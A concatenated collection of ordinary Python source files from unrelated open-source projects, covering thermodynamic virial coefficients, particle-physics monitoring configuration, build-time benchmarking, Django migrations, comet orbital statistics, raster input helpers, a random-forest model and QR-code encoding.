x3 = self.R/(V*V*V)
P_err = T*x2*x3 - P
dP_dT = x3*(T*(V*new_tmp.dB_dT() + new_tmp.dC_dT()) + x2)
return P_err, dP_dT
T_ig = P*V/self.R # guess
T = newton(err, T_ig, fprime=True, xtol=1e-15)
new.T = T
else:
raise ValueError("Two of T, P, or V are needed")
return new
def B(self):
try:
return self._B
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.B_pures(T)[0]
zs = self.zs
B_matrix = self.model.B_matrix(T)
B = 0.0
for i in range(N):
B_tmp = 0.0
row = B_matrix[i]
for j in range(N):
B += zs[j]*row[j]
B += zs[i]*B_tmp
self._B = B
return B
def dB_dT(self):
try:
return self._dB_dT
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.dB_dT_pures(T)[0]
zs = self.zs
dB_dT_matrix = self.model.dB_dT_matrix(T)
dB_dT = 0.0
for i in range(N):
dB_dT_tmp = 0.0
row = dB_dT_matrix[i]
for j in range(N):
dB_dT += zs[j]*row[j]
dB_dT += zs[i]*dB_dT_tmp
self._dB_dT = dB_dT
return dB_dT
def d2B_dT2(self):
try:
return self._d2B_dT2
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.d2B_dT2_pures(T)[0]
zs = self.zs
d2B_dT2_matrix = self.model.d2B_dT2_matrix(T)
d2B_dT2 = 0.0
for i in range(N):
d2B_dT2_tmp = 0.0
row = d2B_dT2_matrix[i]
for j in range(N):
d2B_dT2 += zs[j]*row[j]
d2B_dT2 += zs[i]*d2B_dT2_tmp
self._d2B_dT2 = d2B_dT2
return d2B_dT2
def C(self):
try:
return self._C
except:
pass
T = self.T
zs = self.zs
C_pures = self.model.C_pures(T)
Ciij, Cijj = self.model.C_interactions(T)
C = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
Cval = C_pures[i]
elif i == j:
Cval = Ciij[i][j]
else:
Cval = Cijj[i][j]
C += zs[i]*zs[j]*zs[k]*Cval
self._C = C
return C
def dC_dT(self):
try:
return self._dC_dT
except:
pass
T = self.T
zs = self.zs
dC_dT_pures = self.model.dC_dT_pures(T)
dC_dTiij, dC_dTijj = self.model.dC_dT_interactions(T)
dC_dT = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
dC_dTval = dC_dT_pures[i]
elif i == j:
dC_dTval = dC_dTiij[i][j]
else:
dC_dTval = dC_dTijj[i][j]
dC_dT += zs[i]*zs[j]*zs[k]*dC_dTval
self._dC_dT = dC_dT
return dC_dT
def d2C_dT2(self):
try:
return self._d2C_dT2
except:
pass
T = self.T
zs = self.zs
d2C_dT2_pures = self.model.d2C_dT2_pures(T)
d2C_dT2iij, d2C_dT2ijj = self.model.d2C_dT2_interactions(T)
d2C_dT2 = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
d2C_dT2val = d2C_dT2_pures[i]
elif i == j:
d2C_dT2val = d2C_dT2iij[i][j]
else:
d2C_dT2val = d2C_dT2ijj[i][j]
d2C_dT2 += zs[i]*zs[j]*zs[k]*d2C_dT2val
self._d2C_dT2 = d2C_dT2
return d2C_dT2
|
DQM/TrackingMonitorSource/python/TrackingSourceConfigP5_cff.py
|
malbouis/cmssw
| 852 |
123106
|
<reponame>malbouis/cmssw<filename>DQM/TrackingMonitorSource/python/TrackingSourceConfigP5_cff.py
import FWCore.ParameterSet.Config as cms
# TrackingMonitor ####
# Clone for Cosmic Track Finder
from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
TrackMon_cosmicTk = TrackerCosmicTrackMon.clone(
TrackProducer = 'cosmictrackfinderP5',
AlgoName = 'CosmicTk',
FolderName = 'Tracking/TrackParameters',
doSeedParameterHistos = True,
TkSizeBin = 4,
TkSizeMax = 3.5,
TkSizeMin = -0.5
)
# Clone for CKF Tracks
from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
TrackMon_ckf = TrackerCosmicTrackMon.clone(
TrackProducer = 'ctfWithMaterialTracksP5',
AlgoName = 'CKFTk',
FolderName = 'Tracking/TrackParameters',
doSeedParameterHistos = True,
TkSizeBin = 4,
TkSizeMax = 3.5,
TkSizeMin = -0.5
)
# Clone for Road Search Tracks
# from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
# TrackMon_rs = TrackerCosmicTrackMon.clone(
# TrackProducer = 'rsWithMaterialTracksP5',
# AlgoName = 'RSTk',
# FolderName = 'Tracking/TrackParameters',
# doSeedParameterHistos = True
# )
# Clone for General Track (for Collision data)
from DQM.TrackingMonitor.TrackerCollisionTrackingMonitor_cfi import *
TrackMon_gentk = TrackerCollisionTrackMon.clone(
FolderName = 'Tracking/TrackParameters',
BSFolderName = 'Tracking/TrackParameters/BeamSpotParameters'
# decrease number of histograms
# doTrackerSpecific = False
)
# Clone for Heavy Ion Tracks (for HI Collisions)
from DQM.TrackingMonitor.TrackerHeavyIonTrackingMonitor_cfi import *
TrackMon_hi = TrackerHeavyIonTrackMon.clone(
FolderName = 'Tracking/TrackParameters',
BSFolderName = 'Tracking/TrackParameters/BeamSpotParameters'
)
# Tracking Efficiency ####
# Clone for Cosmic Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_cosmicTk = TrackEffMon.clone(
TKTrackCollection = 'cosmictrackfinderP5',
AlgoName = 'CosmicTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for CKF Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_ckf = TrackEffMon.clone(
TKTrackCollection = 'ctfWithMaterialTracksP5',
AlgoName = 'CKFTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for RS Tracks
# from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
# TrackEffMon_rs = TrackEffMon.clone(
# TKTrackCollection = 'rsWithMaterialTracksP5',
# AlgoName = 'RSTk',
# FolderName = 'Tracking/TrackParameters/TrackEfficiency'
# )
# Clone for Beam Halo Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_bhmuon = TrackEffMon.clone(
TKTrackCollection = 'ctfWithMaterialTracksBeamHaloMuon',
AlgoName = 'BHMuonTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for Heavy Ion Tracks (for HI Collisions)
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_hi = TrackEffMon.clone(
TKTrackCollection = 'hiGeneralTracks',
AlgoName = 'HeavyIonTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
|
Tools/Find V-Ray Versions/GetVRayVersions.py
|
aplishka-az/Deadline
| 113 |
123110
|
<reponame>aplishka-az/Deadline<filename>Tools/Find V-Ray Versions/GetVRayVersions.py
import _winreg
import pprint
SOFTWARE = 'V-Ray'
try:
i = 0
explorer = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
)
while True:
key = _winreg.EnumKey(explorer, i)
if SOFTWARE in key:
item = _winreg.OpenKey(explorer, key)
version, type = _winreg.QueryValueEx(item, "DisplayVersion")
_winreg.CloseKey(item)
print('{0}:\n\t{1}'.format(key, version))
i += 1
except WindowsError as e:
print(e)
_winreg.CloseKey(explorer)
|
openbook_posts/migrations/0003_postreaction_emoji.py
|
TamaraAbells/okuna-api
| 164 |
123122
|
<gh_stars>100-1000
# Generated by Django 2.1.2 on 2018-10-22 12:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0002_auto_20181022_1406'),
]
operations = [
migrations.AddField(
model_name='postreaction',
name='emoji',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='reactions', to='openbook_posts.PostReactionEmoji'),
preserve_default=False,
),
]
|
Qt-Widgets-and-more/compileTime/time-compile.py
|
jgompis/kdabtv
| 140 |
123134
|
import subprocess, re, sys,os, os.path, shutil, time, glob
ROOT="/home/blackie/dump/KDABViewer"
BUILDROOT=ROOT+"/build"
ITERATIONS=5
FOREAL=1
CCACHE="/usr/lib/ccache"
def runCommand(cmd):
print(" ".join(cmd))
if FOREAL:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
res = process.communicate()[0]
#print(res)
def nukeBuildDir():
if FOREAL:
shutil.rmtree(BUILDROOT)
os.mkdir(BUILDROOT)
def clearCCache():
runCommand(["/usr/bin/ccache", "-C"])
def runCMake(clang, ninja, define=None):
command=["cmake"]
if clang:
command = command + ["-DCMAKE_CXX_COMPILER=clang++"]
if ninja:
command = command + ["-G", "Ninja"]
if define:
command = command + ["-DCMAKE_CXX_FLAGS=-D" + define]
command = command + [".."]
runCommand(command)
def compile(ninja):
os.environ["MAKEFLAGS"]="-j 16"
command = ["make", "-j", "16"]
if ninja:
command = ["ninja"]
runCommand(command)
def setOutputFile(filename):
global TIMINGFILE
TIMINGFILE="/home/blackie/profiling/"+filename
writeHeader()
def writeHeader():
FILE = open(TIMINGFILE, "w")
FILE.write("compiler,build system,cclang on,stage,time\n")
def addOutputLine(clang,ninja,step,time):
FILE = open(TIMINGFILE, "a+")
ccacheon = "ccache" in os.environ["PATH"]
FILE.write("%s,%s,%s,%s,%s\n" % ("clang" if clang else "gcc", "ninja" if ninja else "make", "yes" if ccacheon else "no", step, int(round(time))))
def makeClean(ninja):
runCommand(["ninja" if ninja else "make", "clean"])
def timeAndWrite(clang,ninja,step):
start=time.time()
compile(ninja)
end = time.time()
addOutputLine(clang,ninja, step, end-start)
def setOrUnsetCCacheInPath(doInclude):
path = os.environ["PATH"].split(":")
path = filter(lambda item: "ccache" not in item, path)
if doInclude:
path = [CCACHE] + path
os.environ["PATH"] = ":".join(path)
# ---------------------------- Test funcitons
def oneGoWithCompilterAndBuildSystem(clang,ninja):
clearCCache()
nukeBuildDir()
os.chdir(BUILDROOT)
runCMake(clang=clang, ninja=ninja)
timeAndWrite(clang, ninja, "full build")
# rebuild after make clean
clearCCache()
makeClean(ninja)
timeAndWrite(clang, ninja, "clean build")
def compileAndBuildSystemTest():
setOutputFile("compilerAndBuild.csv")
setOrUnsetCCacheInPath(0)
for round in range(ITERATIONS):
print("compileAndBuildSystemTest------> Round %d of %d" % (round+1, ITERATIONS))
for ninja in [0, 1]:
for clang in [0,1]:
oneGoWithCompilterAndBuildSystem(clang=clang,ninja=ninja)
def ccacheTest():
setOutputFile("ccache.csv")
for useccache in [0,1]:
setOrUnsetCCacheInPath(useccache)
for round in range(ITERATIONS):
print("ccacheTest------> Round %d of %d (using CCache=%s)" % (useccache*ITERATIONS + round+1, ITERATIONS*2,"yes" if useccache else "no"))
oneGoWithCompilterAndBuildSystem(clang=1, ninja=1)
def runPCHMutation(headers):
for index in range(len(headers)+1):
subList = headers[:index]
if FOREAL:
FILE = open(ROOT + "/KDABViewer_pch.h","w")
for x in subList:
FILE.write("#include <%s>\n" % x)
FILE.close()
nukeBuildDir()
os.chdir(BUILDROOT)
runCMake(clang=1,ninja=1)
compile(ninja=1)
for round in range(ITERATIONS):
print("pchTest------> Round %d of %d" % (index*ITERATIONS + round+1, ITERATIONS*len(headers)+1))
clearCCache()
makeClean(ninja=1)
timeAndWrite(clang=1, ninja=1, step="/" + "/".join(subList))
def pchTest():
setOutputFile("PCH.csv")
setOrUnsetCCacheInPath(0)
runPCHMutation(["QtWidgets", "QtGui", "QtCore", "KDChart", "memory", "functional"]) # "chrono", "cmath", "optional", "mutex", "array", "vector", "numeric", "algorithm"
runPCHMutation(["QtCore", "QtGui", "QtWidgets"])
# -------- pchMostUsedTest
REGEXP = re.compile("^#include *<(Q.*/)?([a-zA-Z_]+)>")
def countIncludes(filename, map):
with open(filename) as fp:
for line in fp.readlines():
match = REGEXP.match(line)
if match:
str = match.group(2)
if str in map:
map[str]= map[str]+1
else:
map[str] = 1
def findSystemIncludes():
map = {}
for filename in glob.glob(ROOT + "/**/*.cpp", recursive=1)+ glob.glob(ROOT + "/**/*.h",recursive=1) :
if "3rdparty" in filename or "prefix" in filename or "xternal" in filename:
continue
countIncludes(filename, map)
list = sorted(map.items(), key=lambda x: x[1])
list.reverse()
print(list)
return [key for (key,count) in list]
def pchMostUsedTest():
setOutputFile("PCH-most-used.csv")
setOrUnsetCCacheInPath(0)
nukeBuildDir()
os.chdir(BUILDROOT)
# We need to build it all first, so we get all the ui_* files into existance
runCMake(clang=1,ninja=1)
compile(ninja=1)
list = findSystemIncludes()
steps=len(list)
for stage in range(steps):
with open(ROOT + "/KDABViewer_pch.h","w") as FILE:
for i in range(stage):
FILE.write("#include<%s>\n" % list[i])
runCMake(clang=1,ninja=1)
compile(ninja=1)
for round in range(ITERATIONS):
print("pchMostUsedTest------> Round %d of %d" % (stage*ITERATIONS + round+1, ITERATIONS*steps))
makeClean(ninja=1)
timeAndWrite(clang=1, ninja=1, step="%d" % stage)
#compileAndBuildSystemTest()
#ccacheTest()
#pchTest()
#pchMostUsedTest()
|
lwp/authenticators/database.py
|
cocoy/LXC-Web-Panel
| 237 |
123158
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
from lwp.utils import query_db, hash_passwd
class database:
def authenticate(self, username, password):
hash_password = hash_passwd(password)
return query_db('select name, username, su from users where username=? and password=?', [username, hash_password], one=True)
|
avionics/firmware/startup/build_rules.bzl
|
leozz37/makani
| 1,178 |
123164
|
<reponame>leozz37/makani<filename>avionics/firmware/startup/build_rules.bzl
"""This module contains rules for the startup c library."""
load("//lib/bazel:c_rules.bzl", "makani_c_library")
def _get_linkopts(ld_files):
return (["-Tavionics/firmware/startup/" + f for f in ld_files])
def startup_c_library(name, deps = [], ld_files = [], linkopts = [], **kwargs):
makani_c_library(
name = name,
deps = deps + ld_files,
linkopts = linkopts + _get_linkopts(ld_files),
**kwargs
)
|
examples/neural_network_vgg7/import_vgg7.py
|
dSandley20/KomputeParticles
| 445 |
123205
|
import numpy
import json
import os
import sys
import time
import sh_common
if len(sys.argv) != 2:
print("import_vgg7.py JSONPATH")
print(" i.e. import_vgg7.py /home/you/Documents/External/waifu2x/models/vgg_7/art/scale2.0x_model.json")
sys.exit(1)
try:
os.mkdir("model-kipper")
except:
pass
data_list = json.load(open(sys.argv[1], "rb"))
idx = 0
for i in range(7):
layer = data_list[i]
w = numpy.array(layer["weight"])
w.reshape((-1, 3, 3)).transpose((0, 2, 1))
b = numpy.array(layer["bias"])
sh_common.save_param("kipper", idx, w)
idx += 1
sh_common.save_param("kipper", idx, b)
idx += 1
|
part9/SpaceSciencePython_part9.py
|
ajpmaclean/SpaceScienceTutorial
| 167 |
123236
|
# Import the standard modules
import sqlite3
import spiceypy
# Import the installed modules
import pandas as pd
import numpy as np
# Import matplotlib for plotting
from matplotlib import pyplot as plt
# Import scipy for the Kernel Density Estimator functionality
from scipy import stats
#%%
# Connect to the comet database. This database has been created in tutorial
# part 7, however, due to its small size the database is uploaded on GitHub
con = sqlite3.connect('../_databases/_comets/mpc_comets.db')
# Set a cursor
cur = con.cursor()
# Create a pandas dataframe that contains the name of the comet (needed later),
# the semi-major axis, inclination and eccentricity
# for P type ...
P_TYPE_DF = pd.read_sql('SELECT NAME, SEMI_MAJOR_AXIS_AU, INCLINATION_DEG, ' \
'ECCENTRICITY FROM comets_main WHERE ORBIT_TYPE="P"', \
con)
# ... and C type comets. For this type: set the eccentricity smaller 1 (bound
# orbits)
C_TYPE_DF = pd.read_sql('SELECT NAME, SEMI_MAJOR_AXIS_AU, INCLINATION_DEG, ' \
'ECCENTRICITY FROM comets_main WHERE ORBIT_TYPE="C" ' \
'AND ECCENTRICITY<1', con)
#%%
# The Tisserand parameter will help us to distinguish between Jupiter Family
# Comets (JFCs) and Non-JFCss more easily. For this parameter (next block) we
# need the semi-major axis of Jupiter
# Import a kernel meta file
spiceypy.furnsh('kernel_meta.txt')
# Set any Ephemeris time (ET)
SAMPLE_ET = spiceypy.utc2et('2000-001T00:00:00')
# Compute the state vector of Jupiter in ECLIPJ2000 (Jupiter (599) is not
# available in the kernel, we use the barycentre (5))
STATE_VEC_JUPITER, _ = spiceypy.spkgeo(targ=5, \
et=SAMPLE_ET, \
ref='ECLIPJ2000', \
obs=10)
# Get the G*M value of the Sun
_, GM_SUN_PRE = spiceypy.bodvcd(bodyid=10, item='GM', maxn=1)
GM_SUN = GM_SUN_PRE[0]
# Compute the orbital elements of Jupiter
ORB_ELEM_JUPITER = spiceypy.oscltx(STATE_VEC_JUPITER, SAMPLE_ET, GM_SUN)
# Get the semi-major axis value
A_JUPITER_KM = ORB_ELEM_JUPITER[-2]
# Convert the value from km to AU
A_JUPITER_AU = spiceypy.convrt(A_JUPITER_KM, 'km', 'AU')
#%%
# Define a lambda function for the Tisserand parameter, a, i and e are the
# input parameters semi-major axis, inclination and eccentricity, respectively
tisr_jup = lambda a, i, e: (A_JUPITER_AU / a) + 2 * np.cos(i) \
* np.sqrt((a / A_JUPITER_AU) * (1 - (e**2.0)))
# Create a new dataframe columns that contains the Tisserand parameter
P_TYPE_DF.loc[:, 'TISSERAND_JUP'] = \
P_TYPE_DF.apply(lambda x: (tisr_jup(a=x['SEMI_MAJOR_AXIS_AU'], \
i=np.radians(x['INCLINATION_DEG']), \
e=x['ECCENTRICITY'])), axis=1)
C_TYPE_DF.loc[:, 'TISSERAND_JUP'] = \
C_TYPE_DF.apply(lambda x: (tisr_jup(a=x['SEMI_MAJOR_AXIS_AU'], \
i=np.radians(x['INCLINATION_DEG']), \
e=x['ECCENTRICITY'])), axis=1)
#%%
# Print some descriptive statistics of the P type comets
print('Descriptive statistics of the Tisserand parameter of P type comets')
print(f'{P_TYPE_DF["TISSERAND_JUP"].describe()}')
print('\n')
# Compute the percentage of Jupiter-Family Comets (JFCs) based on P types
PERC_P_TYPE_JFCS = len(P_TYPE_DF.loc[(P_TYPE_DF["TISSERAND_JUP"] > 2) \
& (P_TYPE_DF["TISSERAND_JUP"] < 3)]) \
/ len(P_TYPE_DF.index) * 100
PERC_P_TYPE_JFCS = round(PERC_P_TYPE_JFCS, 0)
# Print how many P comets have a Tisserand parameter between 2 and 3:
print('Percentage of P type comets with a Tisserand parameter between ' \
f'2 and 3: {PERC_P_TYPE_JFCS}%')
print('\n')
# Print some descriptive statistics of the C type comets
print('Descriptive statistics of the Tisserand parameter of C type comets')
print(f'{C_TYPE_DF["TISSERAND_JUP"].describe()}')
print('\n')
#%%
# We define a function to add a new column in an already existing database
# table. This code snippet may be helpful in the future
def add_col2tab(con_db, cur_db, tab_name, col_name, col_type):
"""
This function adds a new column to an already existing SQLite table.
Setting a new or editing an existing key (primary or foreign) is not
possible.
Parameters
----------
con_db : sqlite3.Connection
Connection object to the SQLite database.
cur_db : sqlite3.Cursor
Connection corresponding cursor.
tab_name : str
Table name.
col_name : str
New column name that shall be added.
col_type : str
New column name corresponding SQLite column type.
Returns
-------
None.
"""
# Iterate through all existing column names of the database table using
# the PRAGMA table_info command
for row in cur_db.execute(f'PRAGMA table_info({tab_name})'):
# If the column exists: exit the function
if row[1] == col_name:
break
# If the column is not existing yet, add the new column
else:
cur_db.execute(f'ALTER TABLE {tab_name} ' \
f'ADD COLUMN {col_name} {col_type}')
con_db.commit()
# Add a new column in the comets_main table for the Tisserand parameters
add_col2tab(con_db=con, \
cur_db=cur, \
tab_name='comets_main', \
col_name='TISSERAND_JUP', \
col_type='REAL')
#%%
# Add the Tisserand parameter results to the database
cur.executemany('UPDATE comets_main SET TISSERAND_JUP=? WHERE NAME=?', \
P_TYPE_DF[['TISSERAND_JUP', 'NAME']].values)
con.commit()
cur.executemany('UPDATE comets_main SET TISSERAND_JUP=? WHERE NAME=?', \
C_TYPE_DF[['TISSERAND_JUP', 'NAME']].values)
con.commit()
#%%
# Compute the KDE distribution for the Tisserand values, ranging from -1 to
# 5
TISSERAND_RANGE = np.linspace(0, 5, 1000)
# Kernel and distribution computation for the P type comets
P_TYPE_TISR_KERNEL = stats.gaussian_kde(P_TYPE_DF['TISSERAND_JUP'])
P_TYPE_TISR_DISTR = P_TYPE_TISR_KERNEL(TISSERAND_RANGE)
# Kernel and distribution computation for the C type comets
C_TYPE_TISR_KERNEL = stats.gaussian_kde(C_TYPE_DF['TISSERAND_JUP'])
C_TYPE_TISR_DISTR = C_TYPE_TISR_KERNEL(TISSERAND_RANGE)
#%%
# Square-root choice for the histograms number of bins
nr_of_bins = lambda data_array: int(np.floor(np.sqrt(len(data_array))))
# Let's set a dark background
plt.style.use('dark_background')
# Set a default font size for better readability
plt.rcParams.update({'font.size': 14})
# Create a figure and axis
fig, ax = plt.subplots(figsize=(12, 8))
# Histogram of the P and C type comets' Tisserand parameter.
ax.hist(P_TYPE_DF['TISSERAND_JUP'], \
bins=nr_of_bins(P_TYPE_DF['TISSERAND_JUP']), \
density=True, color='tab:orange', alpha=0.5, label='P Type')
ax.hist(C_TYPE_DF['TISSERAND_JUP'], \
bins=nr_of_bins(C_TYPE_DF['TISSERAND_JUP']), \
density=True, color='tab:blue', alpha=0.5, label='C Type')
# Plot the KDE of the P type comets
ax.plot(TISSERAND_RANGE, P_TYPE_TISR_DISTR, color='tab:orange', alpha=1, linestyle='solid')
# Plot the KDE of the C type comets
ax.plot(TISSERAND_RANGE, C_TYPE_TISR_DISTR, color='tab:blue', alpha=1, linestyle='solid')
# Set an x axis limits
ax.set_xlim(0, 5)
# Add a grid for better readability
ax.grid(axis='both', linestyle='dashed', alpha=0.2)
# Set an x and y label
ax.set_xlabel('Tisserand Parameter w.r.t. Jupiter')
ax.set_ylabel('Normalised Distribution')
# Re-define the opacity (alpha value) of the markers / lines in the
# legend for better visibility
leg = ax.legend(fancybox=True, loc='upper right', framealpha=1)
for lh in leg.legendHandles:
lh.set_alpha(1)
# Save the figure
plt.savefig('comets_kde_tisserand_jup.png', dpi=300)
|
cars/core/inputs.py
|
CNES/cars
| 134 |
123246
|
<gh_stars>100-1000
#!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2020 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of CARS
# (see https://github.com/CNES/cars).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Inputs module:
contains some CARS global shared general purpose inputs functions
"""
# Standard imports
import logging
import warnings
from typing import Tuple
# Third party imports
import fiona
import rasterio as rio
import xarray as xr
from json_checker import Checker
from shapely.geometry import shape
# Filter rasterio warning when image is not georeferenced
warnings.filterwarnings("ignore", category=rio.errors.NotGeoreferencedWarning)
def read_vector(path_to_file):
"""
Read vector file and returns the corresponding polygon
:raise Exception when the input file is unreadable
:param path_to_file: path to the file to open
:type path_to_file: str
:return: a shapely polygon
:rtype: tuple (polygon, epsg)
"""
try:
polys = []
with fiona.open(path_to_file) as vec_file:
_, epsg = vec_file.crs["init"].split(":")
for feat in vec_file:
polys.append(shape(feat["geometry"]))
except BaseException as base_except:
raise Exception(
"Impossible to read {} file".format(path_to_file)
) from base_except
if len(polys) == 1:
return polys[0], int(epsg)
if len(polys) > 1:
logging.info(
"Multi features files are not supported, "
"the first feature of {} will be used".format(path_to_file)
)
return polys[0], int(epsg)
logging.info("No feature is present in the {} file".format(path_to_file))
return None
def rasterio_get_nb_bands(raster_file: str) -> int:
"""
Get the number of bands in an image file
:param f: Image file
:returns: The number of bands
"""
with rio.open(raster_file, "r") as descriptor:
return descriptor.count
def rasterio_get_size(raster_file: str) -> Tuple[int, int]:
"""
Get the size of an image (file)
:param raster_file: Image file
:returns: The size (width, height)
"""
with rio.open(raster_file, "r") as descriptor:
return (descriptor.width, descriptor.height)
def rasterio_can_open(raster_file: str) -> bool:
"""
Test if a file can be open by rasterio
:param raster_file: File to test
:returns: True if rasterio can open file and False otherwise
"""
try:
rio.open(raster_file)
return True
except Exception as read_error:
logging.warning(
"Impossible to read file {}: {}".format(raster_file, read_error)
)
return False
def ncdf_can_open(file_path):
"""
Checks if the given file can be opened by NetCDF
:param file_path: file path.
:type file_path: str
:return: True if it can be opened, False otherwise.
:rtype: bool
"""
try:
with xr.open_dataset(file_path) as _:
return True
except Exception as read_error:
logging.warning(
"Exception caught while trying to read file {}: {}".format(
file_path, read_error
)
)
return False
def check_json(conf, schema):
"""
Check a dictionary with respect to a schema
:param conf: The dictionary to check
:type conf: dict
:param schema: The schema to use
:type schema: dict
:returns: conf if check succeeds (else raises CheckerError)
:rtype: dict
"""
schema_validator = Checker(schema)
checked_conf = schema_validator.validate(conf)
return checked_conf
|
models/rfmodel.py
|
arp19690/AIAlpha
| 1,115 |
123295
|
<gh_stars>1000+
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import BaggingClassifier as BC
from sklearn.metrics import f1_score
from sklearn.metrics import log_loss
class RFModel:
def __init__(self, input_shape):
self.input_shape = input_shape
def make_model(self, n_estimators, n_jobs, verbose=1):
model1 = RF(n_estimators=1, criterion='entropy', bootstrap=False, class_weight='balanced_subsample')
self.model = BC(base_estimator=model1, n_estimators=n_estimators, max_features=1., verbose=verbose)
def train_model(self, x, y, sample_weights=None):
self.model.fit(x, y, sample_weight=sample_weights)
def test_model(self, x, y, sample_weights=None):
# model_acc = self.model.score(x, y, sample_weight=sample_weights)
# zeros_count = y['y_values'].value_counts().loc[0]
# null_acc = zeros_count/len(y)
y_true = pd.DataFrame(index=y.index)
y_true.loc[y['y_values'] == 1, 'up'] = 1
y_true.loc[y['y_values'] == -1, 'down'] = 1
y_true.loc[y['y_values'] == 0, 'no_ch'] = 1
y_true = y_true.fillna(0)
y_pred = self.model.predict_proba(x)
model_loss = log_loss(y_true, y_pred, sample_weight=sample_weights)
base_case = pd.DataFrame(index=y.index)
base_case['up'] = np.zeros(len(y))
base_case['down'] = np.zeros(len(y))
base_case['no_ch'] = np.ones(len(y))
base_loss = log_loss(y_true, base_case)
# print(f'Model accuracy: {model_acc}')
# print(f'Null accuracy: {null_acc}')
print(f'Model log loss: {model_loss}')
print(f'Base log loss: {base_loss}')
|
src/qrcode/pyqart/qr/data/base.py
|
lapinozz/ArtCoder
| 525 |
123305
|
# Added at : 2016.7.28
# Author : 7sDream
# Usage : A base data mode class for encoding data to bytes.
# All specific data model inherit from this class.
import abc
from ...common import Bits
from .exception import QrEncodingException
__all__ = ['BaseType']
class BaseType(object):
def __init__(self, data, cci_length):
"""
:param data: Data to be encoded
:param int cci_length: value_upper of Char Count Indicator in bit
"""
assert len(data) > 0, 'Unable to encode empty data.'
self._data = data
self._cci_length = cci_length
self._validate()
@property
def data(self):
"""
:return: provided, raw original data
"""
return self._data
@property
@abc.abstractmethod
def _encoded_data_part_length(self):
return 0
@property
def needed_space(self):
return 4 + self._cci_length + self._encoded_data_part_length
@property
@abc.abstractmethod
def _mode_indicator(self):
"""
:return: A 4-bit data to indicate what model is using,
Use the lower 4 data.
:rtype: int
"""
pass
@property
def _char_count_indicator(self):
"""
:return: Placed before encoded data to indicate data value_upper,
it's own value_upper is decided by :any:`cci_length`.
:rtype: Bits
"""
bits = Bits()
bits.append(0, self._cci_length - len(self.data).bit_length())
bits.append(len(self.data), len(self.data).bit_length())
return bits
@abc.abstractmethod
def _validate(self):
"""
validate data, raise :any:`QrDataInvalidException`
if data is invalid, implemented by subclasses.
:raise: QrDataInvalidException
"""
pass
@property
@abc.abstractmethod
def _encoded_data_part(self):
"""
encode data to bytes use specific model, implemented by subclasses.
:return: encoded data
:rtype: Bits
"""
pass
@property
def output(self):
"""
:return: Output encoded data.
:rtype: Bits
"""
bits = Bits()
bits.append(self._mode_indicator, 4)
bits.extend(self._char_count_indicator)
bits.extend(self._encoded_data_part)
if bits.length != self.needed_space:
raise QrEncodingException(
type(self), self.data,
info="Encoded data value_upper does not match expectations.",
exception=self.needed_space,
actual=bits.length,
)
return bits
def __str__(self):
mi = Bits()
mi.append(self._mode_indicator, 4)
cci = Bits()
cci.extend(self._char_count_indicator)
encoded_data = Bits()
encoded_data.extend(self._encoded_data_part)
string = "{type} at {id:x}: " \
"{{data: {data}, mi: {mi}, cci: {cci}, encode: {code}}}"
return string.format(
type=type(self).__name__, id=id(self),
data=self.data, mi=mi, cci=cci, code=encoded_data,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.